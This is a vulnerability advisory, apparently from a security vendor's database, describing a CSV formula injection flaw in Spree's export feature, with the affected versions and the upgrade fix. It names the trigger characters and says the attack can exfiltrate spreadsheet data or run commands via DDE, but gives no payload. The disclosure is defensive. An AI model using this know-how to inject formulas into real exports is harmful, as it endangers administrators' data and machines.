AIKIDO-2026-11016
spree is vulnerable to CSV Injection
61
Medium Risk
This Affects:
spreeTL;DR
Spree's CSV export models write customer- and admin-facing fields straight into CSV rows without neutralizing spreadsheet formula characters. Before the fix, an attacker who registers as a customer could place values starting with =, +, -, @, tab, or newline into name, email, address, or phone fields, and those values execute as formulas when an administrator opens the exported file in Excel or LibreOffice Calc. The injected formulas can exfiltrate other cell contents from the open spreadsheet or trigger OS command execution via Dynamic Data Exchange in vulnerable spreadsheet configurations. The patch routes every exported row through a new Spree::CSV::FormulaSanitizer that prefixes risky cells with an apostrophe so the spreadsheet treats them as text.
Who does this affect?
You are affected if you are using a version that falls within the vulnerable range.
Background info
spree is vulnerable to CSV Injection in versions 5.2.1 - 5.2.7, 5.3.0 - 5.3.5 and 5.4.0 - 5.4.2.
How to fix this
Upgrade the spree library to the patch version.
Are You Affected?
Connect your repositories to instantly see whether vulnerable or malicious packages exist in your codebase.
Free. No credit card required.
SOC 2Compliant
ISO 27001Compliant